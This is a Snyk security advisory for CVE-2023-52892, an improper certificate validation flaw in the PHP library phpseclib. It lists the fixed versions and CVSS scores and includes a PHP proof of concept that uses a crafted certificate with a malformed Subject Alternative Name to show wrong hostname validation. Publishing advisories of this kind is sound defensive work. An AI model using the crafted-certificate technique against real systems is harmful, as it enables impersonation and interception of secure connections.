| Snyk

Threat Intelligence

Proof of concept

0.05% (18^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk IDSNYK-PHP-PHPSECLIBPHPSECLIB-7411375
published28 Jun 2024
disclosed27 Jun 2024
creditx509-name-testing

Report a new vulnerability Found a mistake?

Introduced: 27 Jun 2024

CVE-2023-52892 (opens in a new tab) CWE-295 (opens in a new tab)

How to fix?

Upgrade phpseclib/phpseclib to version 1.0.22, 2.0.46, 3.0.33 or higher.

Overview

phpseclib/phpseclib is a PHP Secure Communications Library - Pure-PHP implementations of RSA, AES, SSH2, SFTP, X.509 etc.

Affected versions of this package are vulnerable to Improper Certificate Validation due to the handling of special characters in Subject Alternative Name fields of TLS certificates. An attacker can cause name confusion and potentially intercept or manipulate secure communications by crafting certificates that exploit these parsing issues.

PoC

<?php
require 'vendor/autoload.php';
use phpseclib3\File\X509;

$ee_crt = <<<'EOD'
-----BEGIN CERTIFICATE-----
MIIDtTCCAp2gAwIBAgICECEwDQYJKoZIhvcNAQELBQAwYzELMAkGA1UEBhMCVVMx
ITAfBgNVBAoTGFRoZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28g
RGFkZHkgQ2xhc3MgMiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xNjAyMDcx
NzI0MDBaFw0yNDAxMDYwNjQ0NThaMHkxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
QTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEUMBIGA1UEChMLR29vZ2xlIEluYy4x
GDAWBgNVBAsTD0dvb2dsZSBSZXNlYXJjaDEVMBMGA1UEAxQMKi5nb29nbGUuY29t
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAxUWTaM/RKjoA8urhPYXr
Nh2Oz9HA88XkFIxhD3pm80wBlTTTnymSJJVWKpEJO7OyengVFRIv7U19VAFd8VCh
TCiFl7a4hsiWWQi3zh/NYgj0BnweNriblknBKTze6te1DP8otZ22qBUmhCR27aER
MWE9urWLwMIuJN/hxK234MljS9lBB3fv52RrZzSftga/P5zK34ZOlbnGcLbtoKR3
p0uWakBZM8u/665hQ4u4+YkA2kJy5YSF6wXpYKl29/mj1w9ODJTUFj3KmliiGXeo
2IhYLu4Pq52D7OKjDvKZRKK6tOM8Pii1c310ljlCewCuF/Oy/ygbNmaJG7J8/jTA
pwIBA6NfMF0wDAYDVR0TAQH/BAIwADANBgNVHREEBjAEggJhKzAdBgNVHQ4EFgQU
Zd/yRfldVXIxnAKzGaO6vZrb2XswHwYDVR0jBBgwFoAU4J1tAjJyIZ/+BvOatp4W
N1Fo5MMwDQYJKoZIhvcNAQELBQADggEBAAcwSIxKQegRqCs7adDb3VbqP1Ld0dA6
FydwendbN1P4NaqqdM89NhpOVZ5g60eM4sc08m5oZIMWqjwp3Gyf2pqM2FMQ02zi
1lMRb+t9rtjtZXCdcTjuwySYXw7M7NM0Lxhv7yN9+Vben1RTBWFghk8y4t6sai5L
68hFu+fkQzKIpHE/9cdBS+rtqyCrNit3kvqVhVpGECTS2flTBHnCe7mINojSTOsB
JYhGgW6KsKViE0hzQB8dSAcNcfwQPSKzOd02crXdJ7uYvZZK9prN83Oe1iDaizeA
1ntA2AzsC0OGg/ekAnAlxia3mzcJv0PgxRpSG7xjWSL+FVFTTs2I/wk=
-----END CERTIFICATE-----
EOD;
// the ee cert `DNS=a+`
$name = "aa";

$x509 = new X509();
// $ca = $x509->loadCA(file_get_contents($ca_cert_path));
$ee = $x509->loadX509($ee_crt);

// domain name 
// echo $name; echo "\n";
if (!strpos($name, "//")) {
    $name = "https://" .  $name;
}
$ret = $x509->validateURL($name);
// echo $ret; echo "\n";
echo $ret ? 'ok' : 'error'; echo "\n";
if ($ret) {exit(0);} 
else {exit(1);}
?>

References

CVSS Scores

version 4.0

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Attack Requirements (AT)
None
Privileges Required (PR)
None
User Interaction (UI)
None

Confidentiality (VC)
High
Integrity (VI)
Low
Availability (VA)
None

Confidentiality (SC)
None
Integrity (SI)
None
Availability (SA)
None

Improper Certificate Validation Affecting phpseclib/phpseclib package, versions <1.0.22>=2.0.0, <2.0.46>=3.0.0, <3.0.33

Severity